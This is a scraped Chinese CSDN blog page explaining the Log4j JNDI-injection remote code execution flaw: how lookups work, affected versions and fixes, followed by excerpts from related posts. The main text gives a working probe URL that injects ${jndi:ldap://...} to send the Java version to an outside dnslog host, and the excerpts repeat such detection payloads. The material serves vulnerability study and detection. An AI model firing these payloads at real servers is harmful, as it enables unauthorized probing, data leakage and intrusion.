Log4J RCE漏洞

最新推荐文章于 2024-08-19 09:53:04 发布
最新推荐文章于 2024-08-19 09:53:04 发布
阅读量766 收藏 2
点赞数
文章标签: log4j apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RuiIDS/article/details/128573100
版权
本文详细介绍了Log4J RCE漏洞,包括其影响范围、排查方法和修复措施。Log4J的JNDI注入原理是通过${jndi:ldap://...}触发,允许攻击者通过LDAP服务器执行恶意代码。修复方案包括禁止lookup下载远程文件、过滤相关关键词和升级Log4j版本。此外,还讲述了Log4J在Java日志记录中的作用及其使用方法。
摘要由CSDN通过智能技术生成

Log4J RCE

首先log4j打印日志有四个级别:debug、info、warn、error;不管哪个方法打印日志,正常的log处理过程中,对 ${ 这两个紧邻的字符做检测,一旦遇到类似报答是结构的字符串就会触发替换机制。一旦log字符串中检测到 ${} ,就会解析其中的字符串尝试使用 JDNI的 lookup()方法 查询,因此,只要能可攻至log阐述内容,就有机会实现漏洞利用。或者说服务器会记录用户输入的信息;这样log4j RCE都会被触发;

讲解loockup方法:
在log4j中可能需要引用一些外部资源、或者动态调用一些资源,通过lookups方法实现;它里面有docker lookup、Java loockup、Jndi loockup等等方法来调用资源(内置好的);通过Java loockup方法可以获取一些Java运行时(${java:runtime})、Java虚拟机(${java:vm})、操作系统的信息(${java:os})等等;我们攻击使用jndi loockup方法可以访问ldap、rmi服务来动态的获取一些资源;

当用户在登录的时候,服务器的后台使用logger.info("xxx" +user.getUsername())来记录用户名,就存在Log4J注入漏洞;

**RMI(远程接口调用):使用RMI同样也可以实现JNDI注入。

请添加图片描述

http://127.0.0.1:8983/admin/cores?action=$ {jndi:ldap://${sys:java.version}.jkvl0r.dnslog.cn}

影响范围

  1. 使用了Log4j的组件,版本在2.x <= 2.14.1
  2. JDK版本小于8u191、7u201、6u211
序号 受影响项目 解决版本
1 Apache Archiva 2.2.6
最低0.47元/天 解锁文章
RuiIDS
关注
CVE-2021-44228 log4j RCE漏洞原理详细分析排查和修补
m0_61506558的博客
09-14 1476
影响范围和排查方法1、CVE-2021-44228影响版本使用了log4j的组件,并且版本在 2.x
Log4j2_RCE漏洞
01-01 2000
前端时间爆出的Log4j2_RCE漏洞可谓是让安全圈提前过年,今天来复现和简单分析下这个漏洞
log4j RCE 漏洞
b10d9的博客
12-19 4146
漏洞概述 记录本次log4j可以远程命令执行的漏洞。 CVE-2021-44228(log4shell):受影响版本:2.0-beta9(2013年9月发布)-2.14.1(2021年3月发布) CVE-2021-45046:受影响版本: 2.0-beta9 to 2.15.0, excluding 2.12.2 log4j是一款基于java的日志工具,是Apache logging server的一部分,是使用非常广泛的一种java日志框架,所以受影响范围极广。 漏洞原理 本次漏
2024年网络安全最全log4j RCE漏洞原理分析及检测_log4j 漏洞监测
2401_84297193的博客
05-03 485
log4j支持使用表达式的形式打印日志,比如问题就在与表达式支持非常多样,其中有一个jndi就是今天的主题jdk将从url指定的路径下载一段字节流,并将其反序列化为Java对象,作为jndi返回。反序列化过程中,即会执行字节流中包含的程序。因此,如果攻击者能够控制日志打印的内容,就可以使目标服务器从攻击者指定的任意url地址下载代码字节流,攻击者在字节流中附带的代码就会在目标服务器上执行。那么问题来了,攻击者如何控制服务器上记录的日志内容呢?非常简单!大部分web服务程序都会对用户输入进行日志记录。
Log4j-RCE-Scanner 使用教程
最新发布
gitblog_00554的博客
08-19 287
Log4j-RCE-Scanner 使用教程 Log4j-RCE-ScannerRemote command execution vulnerability scanner for Log4j.项目地址:https://gitcode.com/gh_mirrors/lo/Log4j-RCE-Scanner 一、项目目录结构及介绍 Log4j-RCE-Scanner/ |-- src/ | |...
LOG4J RCE漏洞分享】
努力学习
12-15 2680
LOG4J RCE漏洞分享 先说结论:有中标,原因在于引⼊的Lo4j2 2.10.0 ,应该绝⼤多业务线都有这个问题,毕竟⽇志组件都是⼀个。 漏洞原因:https://issues.apache.org/jira/projects/LOG4J2/issues/LOG4J2-3201?filter=allissues 漏洞复现: ⽇志打印了,也确实远程执⾏了! 那么同理是不是能够通过JNDI:LDAP的⽅式注⼊⼀个类进来执⾏命令,于是我有⼀个⼤胆的想法! 类加载了。。。命令执⾏了 ...
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
weixin_43895765的博客
12-15 7712
由于排版问题,详情见个人博客文章???? log4j漏洞RCE(CVE-2021-44228)
log4j RCE漏洞原理分析及检测_log4j 漏洞监测,网络安全开发基础学习
2401_83621004的博客
04-15 770
漏洞检测时,可以使用 ${jndi:ldap://http://xxx.dnslog.cn} ,如果攻击成功,目标服务器将会从 xxx.dnslog.cn 下载jndi字节流,下载之前首先得连接dnslog.cn进行xxx.dnslog.cn的域名解析,获得真实ip地址。dnslog.cn 是安全检测常用工具之一,在其主页上点击 Get SubDomain 即可以自动生成一个 dnslog.cn 的子域名,这个子域名解析出来的ip是 127.0.0.1,也就是本机地址。因篇幅有限,仅展示部分资料。
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
Log4j2 RCE 漏洞复现步骤以及根因
weixin_46073333的博客
12-12 6869
相信大家最近一定被log4j2的远程代码执行漏洞所刷屏了,各个互联网厂商,开源组织,还有相关企业都瑟瑟发抖,相关研发人员也都是加班加点紧急修复和改正。笔者也看了一些相关文章,感觉不少都...
log4j RCE漏洞原理分析及检测_log4j 漏洞监测(1),【一步教学,一步到位
weixin_58085973的博客
04-18 596
漏洞检测时,可以使用 ${jndi:ldap://http://xxx.dnslog.cn} ,如果攻击成功,目标服务器将会从 xxx.dnslog.cn 下载jndi字节流,下载之前首先得连接dnslog.cn进行xxx.dnslog.cn的域名解析,获得真实ip地址。因此,如果攻击者能够控制日志打印的内容,就可以使目标服务器从攻击者指定的任意url地址下载代码字节流,攻击者在字节流中附带的代码就会在目标服务器上执行。攻击检测后,如果发现 dnslog.cn 中刷新到了dns解析记录,就表示探测成功。
漏洞预警:Apache Log4j RCE漏洞
热门推荐
土豆的博客
12-13 7万+
目录 Part1 漏洞描述 Part2 危害等级 Part3 漏洞影响 Part4 漏洞分析及验证 源码分析 Part5 漏洞检测 自我检测 攻击检测 产品检测 Part6 漏洞修复 Part1 漏洞描述 Apache Log4jApache的一个开源项目,Apache log4j2是Log4j的升级版本,我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 近日发现Apache Log4j存在任意代码执行
log4j漏洞检测
仅此而已
01-02 2872
1、检测工具下载 下载链接:https://pan.baidu.com/s/1KrLdKf7RbuH4fuz4xw_lcw 提取码:hg37 2、Windows环境检测 将检测工具log4j_vul_check_win.exe放到磁盘根目录执行,工具会将有log4j漏洞的项目显示出来 3、Linux环境检测 将检测工具log4j_vul_check_linux放到磁盘根目录,工具会将有log4j漏洞的项目显示出来 chmod u+x log4j_vul_check_linux ./log4j_vul_c
Log4j 漏洞测试
我是个农民的博客
12-12 5万+
Log4j 漏洞测试 紧跟潮流,介绍在windows下进行 Log4j 漏洞测试,linux上步骤也都一样。 1、参照项目,项目地址: https://github.com/mbechler/marshalsec 克隆代码到本地,mvn clean package -DskipTests打包,target 目录下会生成marshalsec-0.0.3-SNAPSHOT-all.jar 2、新建一个普通的 java 类,等会将此类注入到待测试的项目中。可以随便写逻辑 (生成文件、定时关机等) 示例:功能是在
Log4j 远程代码执行漏洞检测
LiBai'S BLOG
12-14 1万+
Log4j 远程代码执行漏洞检测~
Log4j2-rce-学习
feng的博客
03-04 794
Log4j2-rce-学习 前言 当时漏洞出的时候在准备期末考试就没管,现在重新拾起来。。 exp package com.summer.test; import org.apache.logging.log4j.Logger; import org.apache.logging.log4j.LogManager; public class Test { private static final Logger log = LogManager.getLogger(); public st
Log4j2-RCE
xlsj雪松的博客
12-26 3133
1 Log4j2漏洞官方描述 Apache Log4j2 版本 2.0-alpha1 到 2.16.0(不包括 2.12.3)没有防止自引用查找的不受控制的递归。当日志配置使用带有上下文查找的非默认模式布局(例如,$${ctx:loginId})时,控制线程上下文映射 (MDC) 输入数据的攻击者可以制作包含递归查找的恶意输入数据,导致 StackOverflowError 将终止进程。这也称为 DOS(拒绝服务)攻击。 Log4j 2.x 缓解措施 升级到 Log4j 2.3.1(适用于 Java
Log4j2漏洞(一)原理和dnslog验证
02-06 2049
Log4j2漏洞(一)介绍漏洞前景、漏洞原理、确定注入点和dnslog验证
Apache Log4j 漏洞验证
柳似烟的专栏
12-15 3442
首先下载JNDI-Injection-Exploit,该jar包实现RMI、LDAP服务功能,对外提供服务,且包含用于执行攻击命令的ExecTemplateJDK7.class和ExecTemplateJDK8.class模版文件。 下载包含漏洞版本的log4j的jar包 使用如下3个jar包文件 添加上面3个jar包到工程: 编写测试代码: import org.apache.log4j.Logger; public class Log4jDemo { /** ..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值